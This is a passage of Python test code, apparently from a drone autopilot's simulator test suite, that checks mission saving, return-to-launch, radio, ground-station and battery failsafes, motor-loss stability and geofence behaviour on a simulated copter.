self.set_rc(1, 1500)
# save bottom left corner of square (should be near home) as waypoint
self.progress("Save WP 6")
self.save_wp()
# reduce throttle again
self.set_rc(3, 1500)
# descend to 10m
self.progress("Descend to 10m in Loiter")
self.change_mode('LOITER')
self.set_rc(3, 1200)
time_left = timeout - (self.get_sim_time() - tstart)
self.progress("timeleft = %u" % time_left)
if time_left < 20:
time_left = 20
self.wait_altitude(-10, 10, timeout=time_left, relative=True)
self.set_rc(3, 1500)
self.save_wp()
# save the stored mission to file
mavproxy = self.start_mavproxy()
num_wp = self.save_mission_to_file_using_mavproxy(
mavproxy,
os.path.join(testdir, "ch7_mission.txt"))
self.stop_mavproxy(mavproxy)
if not num_wp:
self.fail_list.append("save_mission_to_file")
self.progress("save_mission_to_file failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.change_mode('AUTO')
self.set_current_waypoint(1)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.progress("test: MISSION COMPLETE: passed!")
self.land_and_disarm()
# enter RTL mode and wait for the vehicle to disarm
def do_RTL(self, distance_min=None, check_alt=True, distance_max=10, timeout=250):
"""Enter RTL mode and wait for the vehicle to disarm at Home."""
self.change_mode("RTL")
self.hover()
self.wait_rtl_complete(check_alt=check_alt, distance_max=distance_max, timeout=timeout)
def wait_rtl_complete(self, check_alt=True, distance_max=10, timeout=250):
"""Wait for RTL to reach home and disarm"""
self.progress("Waiting RTL to reach Home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
home = ""
alt_valid = alt <= 1
distance_valid = home_distance < distance_max
if check_alt:
if alt_valid and distance_valid:
home = "HOME"
else:
if distance_valid:
home = "HOME"
self.progress("Alt: %.02f HomeDist: %.02f %s" %
(alt, home_distance, home))
# our post-condition is that we are disarmed:
if not self.armed():
if home == "":
raise NotAchievedException("Did not get home")
# success!
return
raise AutoTestTimeoutException("Did not get home and disarm")
def fly_loiter_to_alt(self):
"""loiter to alt"""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
num_wp = self.load_mission("copter_loiter_to_alt.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1550)
self.wait_current_waypoint(2)
self.set_rc(3, 1500)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# Tests all actions and logic behind the radio failsafe
def fly_throttle_failsafe(self, side=60, timeout=360):
self.start_subtest("If you haven't taken off yet RC failure should be instant disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_RC_FAIL", 1)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter("DISARM_DELAY", 10)
# Trigger an RC failure with the failsafe disabled. Verify no action taken.
self.start_subtest("Radio failsafe disabled test: FS_THR_ENABLE=0 should take no failsafe action")
self.set_parameter('FS_THR_ENABLE', 0)
self.set_parameter('FS_OPTIONS', 0)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed Radio failsafe disabled test")
# Trigger an RC failure, verify radio failsafe triggers,
# restore radio, verify RC function by changing modes to cicle
# and stabilize.
self.start_subtest("Radio failsafe recovery test")
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.set_rc(5, 1050)
self.wait_mode("CIRCLE")
self.set_rc(5, 1950)
self.wait_mode("STABILIZE")
self.end_subtest("Completed Radio failsafe recovery test")
# Trigger and RC failure, verify failsafe triggers and RTL completes
self.start_subtest("Radio failsafe RTL with no options test: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL with no options test")
# Trigger and RC failure, verify failsafe triggers and land completes
self.start_subtest("Radio failsafe LAND with no options test: FS_THR_ENABLE=3 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 3)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe LAND with no options test")
# Trigger and RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->RTL with no options test: FS_THR_ENABLE=4 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL with no options test")
# Trigger and RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->Land with no options test: FS_THR_ENABLE=5 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL_Land with no options test")
# Trigger a GPS failure and RC failure, verify RTL fails into
# land mode and completes
self.start_subtest("Radio failsafe RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 1)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to bad position.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into RTL and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL fails into RTL mode due to no path.")
# Trigger a GPS failure, then restore the GPS. Trigger an RC
# failure, verify SmartRTL fails into Land and completes
self.start_subtest("Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.wait_statustext("SmartRTL deactivated: bad position", timeout=60)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->LAND fails into land mode due to no path.")
# Trigger an RC failure in guided mode with the option enabled
# to continue in guided. Verify no failsafe action takes place
self.start_subtest("Radio failsafe with option to continue in guided mode: FS_THR_ENABLE=1 & FS_OPTIONS=4")
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.setGCSfailsafe(1)
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter('FS_OPTIONS', 4)
self.takeoffAndMoveAway()
self.change_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("GUIDED")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.change_mode("ALT_HOLD")
self.setGCSfailsafe(0)
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe with option to continue in guided mode")
# Trigger an RC failure in AUTO mode with the option enabled
# to continue the mission. Verify no failsafe action takes
# place
self.start_subtest("Radio failsafe RTL with option to continue mission: FS_THR_ENABLE=1 & FS_OPTIONS=1")
self.set_parameter('FS_OPTIONS', 1)
self.progress("# Load copter_mission")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
# self.takeoffAndMoveAway()
self.change_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("AUTO")
# self.change_mode("RTL")
# self.wait_disarmed()
self.end_subtest("Completed Radio failsafe RTL with option to continue mission")
# Trigger an RC failure in AUTO mode without the option
# enabled to continue. Verify failsafe triggers and RTL
# completes
self.start_subtest("Radio failsafe RTL in mission without "
"option to continue should RTL: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.clear_mission(mavutil.mavlink.MAV_MISSION_TYPE_MISSION)
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL in mission without option to continue")
self.progress("All radio failsafe tests complete")
self.set_parameter('FS_THR_ENABLE', 0)
self.reboot_sitl()
# Tests all actions and logic behind the GCS failsafe
def fly_gcs_failsafe(self, side=60, timeout=360):
try:
self.test_gcs_failsafe(side=side, timeout=timeout)
except Exception as ex:
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.disarm_vehicle(force=True)
self.reboot_sitl()
raise ex
def test_gcs_failsafe(self, side=60, timeout=360):
# Test double-SmartRTL; ensure we do SmarRTL twice rather than
# landing (tests fix for actual bug)
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.context_push()
self.start_subtest("GCS failsafe SmartRTL twice")
self.setGCSfailsafe(3)
self.set_parameter('FS_OPTIONS', 8)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
def ensure_smartrtl(mav, m):
if m.get_type() != "HEARTBEAT":
return
# can't use mode_is here because we're in the message hook
print("Mode: %s" % self.mav.flightmode)
if self.mav.flightmode != "SMART_RTL":
raise NotAchievedException("Not in SMART_RTL")
self.install_message_hook_context(ensure_smartrtl)
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe")
self.wait_disarmed()
self.end_subtest("GCS failsafe SmartRTL twice")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.context_pop()
# Trigger telemetry loss with failsafe disabled. Verify no action taken.
self.start_subtest("GCS failsafe disabled test: FS_GCS_ENABLE=0 should take no failsafe action")
self.setGCSfailsafe(0)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed GCS failsafe disabled test")
# Trigger telemetry loss with failsafe enabled. Verify
# failsafe triggers to RTL. Restore telemetry, verify failsafe
# clears, and change modes.
self.start_subtest("GCS failsafe recovery test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.change_mode("LOITER")
self.end_subtest("Completed GCS failsafe recovery test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe RTL with no options test: FS_GCS_ENABLE=1 & FS_OPTIONS=0")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 0)
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and land completes
self.start_subtest("GCS failsafe LAND with no options test: FS_GCS_ENABLE=5 & FS_OPTIONS=0")
self.setGCSfailsafe(5)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe land with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->RTL with no options test: FS_GCS_ENABLE=3 & FS_OPTIONS=0")
self.setGCSfailsafe(3)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->RTL with no options test")
# Trigger telemetry loss with failsafe enabled. Verify failsafe triggers and SmartRTL completes
self.start_subtest("GCS failsafe SmartRTL->Land with no options test: FS_GCS_ENABLE=4 & FS_OPTIONS=0")
self.setGCSfailsafe(4)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe SmartRTL->Land with no options test")
# Trigger telemetry loss with an invalid failsafe value. Verify failsafe triggers and RTL completes
self.start_subtest("GCS failsafe invalid value with no options test: FS_GCS_ENABLE=99 & FS_OPTIONS=0")
self.setGCSfailsafe(99)
self.takeoffAndMoveAway()
self.set_heartbeat_rate(0)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe invalid value with no options test")
# Trigger telemetry loss with failsafe enabled to test FS_OPTIONS settings
self.start_subtest("GCS failsafe with option bit tests: FS_GCS_ENABLE=1 & FS_OPTIONS=64/2/16")
num_wp = self.load_mission("copter_mission.txt", strict=False)
if not num_wp:
raise NotAchievedException("load copter_mission failed")
self.setGCSfailsafe(1)
self.set_parameter('FS_OPTIONS', 16)
self.takeoffAndMoveAway()
self.progress("Testing continue in pilot controlled modes")
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Pilot Control", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue in auto mission")
self.set_parameter('FS_OPTIONS', 2)
self.change_mode("AUTO")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Auto Mode", timeout=60)
self.delay_sim_time(5)
self.wait_mode("AUTO")
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.progress("Testing continue landing in land mode")
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_heartbeat_rate(0)
self.wait_statustext("GCS Failsafe - Continuing Landing", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_heartbeat_rate(self.speedup)
self.wait_statustext("GCS Failsafe Cleared", timeout=60)
self.end_subtest("Completed GCS failsafe with option bits")
self.setGCSfailsafe(0)
self.set_parameter('FS_OPTIONS', 0)
self.progress("All GCS failsafe tests complete")
self.reboot_sitl()
# Tests all actions and logic behind the battery failsafe
def fly_battery_failsafe(self, timeout=300):
ex = None
try:
self.test_battery_failsafe(timeout=timeout)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.set_parameter('BATT_LOW_VOLT', 0)
self.set_parameter('BATT_CRT_VOLT', 0)
self.set_parameter('BATT_FS_LOW_ACT', 0)
self.set_parameter('BATT_FS_CRT_ACT', 0)
self.set_parameter('FS_OPTIONS', 0)
self.reboot_sitl()
if ex is not None:
raise ex
def test_battery_failsafe(self, timeout=300):
self.progress("Configure battery failsafe parameters")
self.set_parameters({
'SIM_SPEEDUP': 4,
'BATT_LOW_VOLT': 11.5,
'BATT_CRT_VOLT': 10.1,
'BATT_FS_LOW_ACT': 0,
'BATT_FS_CRT_ACT': 0,
'FS_OPTIONS': 0,
'SIM_BATT_VOLTAGE': 12.5,
})
# Trigger low battery condition with failsafe disabled. Verify
# no action taken.
self.start_subtest("Batt failsafe disabled test")
self.takeoffAndMoveAway()
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.change_mode("RTL")
self.wait_rtl_complete()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed Batt failsafe disabled test")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify RTL and Land actions
# complete.
self.start_subtest("Two stage battery failsafe test with RTL and Land")
self.takeoffAndMoveAway()
self.delay_sim_time(3)
self.set_parameter('BATT_FS_LOW_ACT', 2)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("RTL")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with RTL and Land")
# TWO STAGE BATTERY FAILSAFE: Trigger low battery condition,
# then critical battery condition. Verify both SmartRTL
# actions complete
self.start_subtest("Two stage battery failsafe test with SmartRTL")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 3)
self.set_parameter('BATT_FS_CRT_ACT', 4)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.change_mode("LOITER")
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.delay_sim_time(5)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed two stage battery failsafe test with SmartRTL")
# Trigger low battery condition in land mode with FS_OPTIONS
# set to allow land mode to continue. Verify landing completes
# uninterrupted.
self.start_subtest("Battery failsafe with FS_OPTIONS set to continue landing")
self.takeoffAndMoveAway()
self.set_parameter('FS_OPTIONS', 8)
self.change_mode("LAND")
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.delay_sim_time(5)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe with FS_OPTIONS set to continue landing")
# Trigger a critical battery condition, which triggers a land
# mode failsafe. Trigger an RC failure. Verify the RC failsafe
# is prevented from stopping the low battery landing.
self.start_subtest("Battery failsafe critical landing")
self.takeoffAndMoveAway(100, 50)
self.set_parameter('FS_OPTIONS', 0)
self.set_parameter('BATT_FS_LOW_ACT', 1)
self.set_parameter('BATT_FS_CRT_ACT', 1)
self.set_parameter('FS_THR_ENABLE', 1)
self.delay_sim_time(5)
self.set_parameter('SIM_BATT_VOLTAGE', 10.0)
self.wait_statustext("Battery 1 is critical", timeout=60)
self.wait_mode("LAND")
self.delay_sim_time(10)
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(10)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter('SIM_BATT_VOLTAGE', 12.5)
self.set_parameter("SIM_RC_FAIL", 0)
self.reboot_sitl()
self.end_subtest("Completed battery failsafe critical landing")
# Trigger low battery condition with failsafe set to terminate. Copter will disarm and crash.
self.start_subtest("Battery failsafe terminate")
self.takeoffAndMoveAway()
self.set_parameter('BATT_FS_LOW_ACT', 5)
self.delay_sim_time(10)
self.set_parameter('SIM_BATT_VOLTAGE', 11.4)
self.wait_statustext("Battery 1 is low", timeout=60)
self.wait_disarmed()
self.end_subtest("Completed terminate failsafe test")
self.progress("All Battery failsafe tests complete")
# fly_stability_patch - fly south, then hold loiter within 5m
# position and altitude and reduce 1 motor to 60% efficiency
def fly_stability_patch(self,
holdtime=30,
maxaltchange=5,
maxdistchange=10):
self.takeoff(10, mode="LOITER")
# first south
self.progress("turn south")
self.set_rc(4, 1580)
self.wait_heading(180)
self.set_rc(4, 1500)
# fly west 80m
self.set_rc(2, 1100)
self.wait_distance(80)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
# cut motor 1's to efficiency
self.progress("Cutting motor 1 to 65% efficiency")
self.set_parameter("SIM_ENGINE_MUL", 0.65)
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
("Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange)))
# restore motor 1 to 100% efficiency
self.set_parameter("SIM_ENGINE_MUL", 1.0)
self.progress("Stability patch and Loiter OK for %us" % holdtime)
self.progress("RTL after stab patch")
self.do_RTL()
def debug_arming_issue(self):
while True:
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() in ["STATUSTEXT", "COMMAND_ACK"]:
print("Got: %s" % str(m))
if self.mav.motors_armed():
self.progress("Armed")
return
# fly_fence_test - fly east until you hit the horizontal circular fence
avoid_behave_slide = 0
def fly_fence_avoid_test_radius_check(self, timeout=180, avoid_behave=avoid_behave_slide):
using_mode = "LOITER" # must be something which adjusts velocity!
self.change_mode(using_mode)
self.set_parameter("FENCE_ENABLE", 1) # fence
self.set_parameter("FENCE_TYPE", 2) # circle
fence_radius = 15
self.set_parameter("FENCE_RADIUS", fence_radius)
fence_margin = 3
self.set_parameter("FENCE_MARGIN", fence_margin)
self.set_parameter("AVOID_ENABLE", 1)
self.set_parameter("AVOID_BEHAVE", avoid_behave)
self.set_parameter("RC10_OPTION", 40) # avoid-enable
self.wait_ready_to_arm()
self.set_rc(10, 2000)
home_distance = self.distance_to_home(use_cached_home=True)
if home_distance > 5:
raise PreconditionFailedException("Expected to be within 5m of home")
self.zero_throttle()
self.arm_vehicle()
self.set_rc(3, 1700)
self.wait_altitude(10, 100, relative=True)
self.set_rc(3, 1500)
self.set_rc(2, 1400)
self.wait_distance_to_home(12, 20)
tstart = self.get_sim_time()
push_time = 70 # push against barrier for 60 seconds
failed_max = False
failed_min = False
while True:
if self.get_sim_time() - tstart > push_time:
self.progress("Push time up")
break
# make sure we don't RTL:
if not self.mode_is(using_mode):
raise NotAchievedException("Changed mode away from %s" % using_mode)
distance = self.distance_to_home(use_cached_home=True)
inner_radius = fence_radius - fence_margin
want_min = inner_radius - 1 # allow 1m either way
want_max = inner_radius + 1 # allow 1m either way
self.progress("Push: distance=%f %f<want<%f" %
(distance, want_min, want_max))
if distance < want_min:
if failed_min is False:
self.progress("Failed min")
failed_min = True
if distance > want_max:
if failed_max is False:
self.progress("Failed max")
failed_max = True
if failed_min and failed_max:
raise NotAchievedException("Failed both min and max checks. Clever")
if failed_min:
raise NotAchievedException("Failed min")
if failed_max:
raise NotAchievedException("Failed max")
self.set_rc(2, 1500)
self.do_RTL()
def fly_fence_avoid_test(self, timeout=180):
self.fly_fence_avoid_test_radius_check(avoid_behave=1, timeout=timeout)
self.fly_fence_avoid_test_radius_check(avoid_behave=0, timeout=timeout)
def assert_prearm_failure(self, expected_statustext, timeout=5, ignore_prearm_failures=[]):
seen_statustext = False
seen_command_ack = False
self.drain_mav()
tstart = self.get_sim_time_cached()
arm_last_send = 0
while True:
if seen_command_ack and seen_statustext:
break
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException(
"Did not see failure-to-arm messages (statustext=%s command_ack=%s" %
(seen_statustext, seen_command_ack))
if now - arm_last_send > 1:
arm_last_send = now
self.send_mavlink_arm_command()
m = self.mav.recv_match(blocking=True, timeout=1)
if m is None:
continue
if m.get_type() == "STATUSTEXT":
if expected_statustext in m.text:
self.progress("Got: %s" % str(m))
seen_statustext = True
elif "PreArm" in m.text and m.text[8:] not in ignore_prearm_failures:
self.progress("Got: %s" % str(m))
raise NotAchievedException("Unexpected prearm failure (%s)" % m.text)
if m.get_type() == "COMMAND_ACK":
print("Got: %s" % str(m))
if m.command == mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM:
if m.result != 4:
raise NotAchievedException("command-ack says we didn't fail to arm")
self.progress("Got: %s" % str(m))
seen_command_ack = True
if self.mav.motors_armed():
raise NotAchievedException("Armed when we shouldn't have")
# fly_fence_test - fly east until you hit the horizontal circular fence
def fly_fence_test(self, timeout=180):
# enable fence, disable avoidance
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("AVOID_ENABLE", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
# fence requires home to be set:
m = self.poll_home_position()
if m is None:
raise NotAchievedException("Did not receive HOME_POSITION")
self.progress("home: %s" % str(m))
self.start_subtest("ensure we can't arm if outside fence")
self.load_fence("fence-in-middle-of-nowhere.txt")
self.delay_sim_time(5) # let fence check run so it loads-from-eeprom
self.assert_prearm_failure("vehicle outside fence")
self.progress("Failed to arm outside fence (good!)")
self.clear_fence()
self.delay_sim_time(5) # let fence breach clear
self.drain_mav()
self.end_subtest("ensure we can't arm if outside fence")
self.start_subtest("ensure we can't arm with bad radius")
self.context_push()
self.set_parameter("FENCE_RADIUS", -1)
self.assert_prearm_failure("Invalid FENCE_RADIUS value")
self.context_pop()
self.progress("Failed to arm with bad radius")
self.drain_mav()
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("ensure we can't arm with bad alt")
self.context_push()
self.set_parameter("FENCE_ALT_MAX", -1)
self.assert_prearm_failure("Invalid FENCE_ALT_MAX value")
self.context_pop()
self.progress("Failed to arm with bad altitude")
self.end_subtest("ensure we can't arm with bad radius")
self.start_subtest("Check breach-fence behaviour")
self.set_parameter("FENCE_TYPE", 2)
self.takeoff(10, mode="LOITER")
# first east
self.progress("turn east")
self.set_rc(4, 1580)
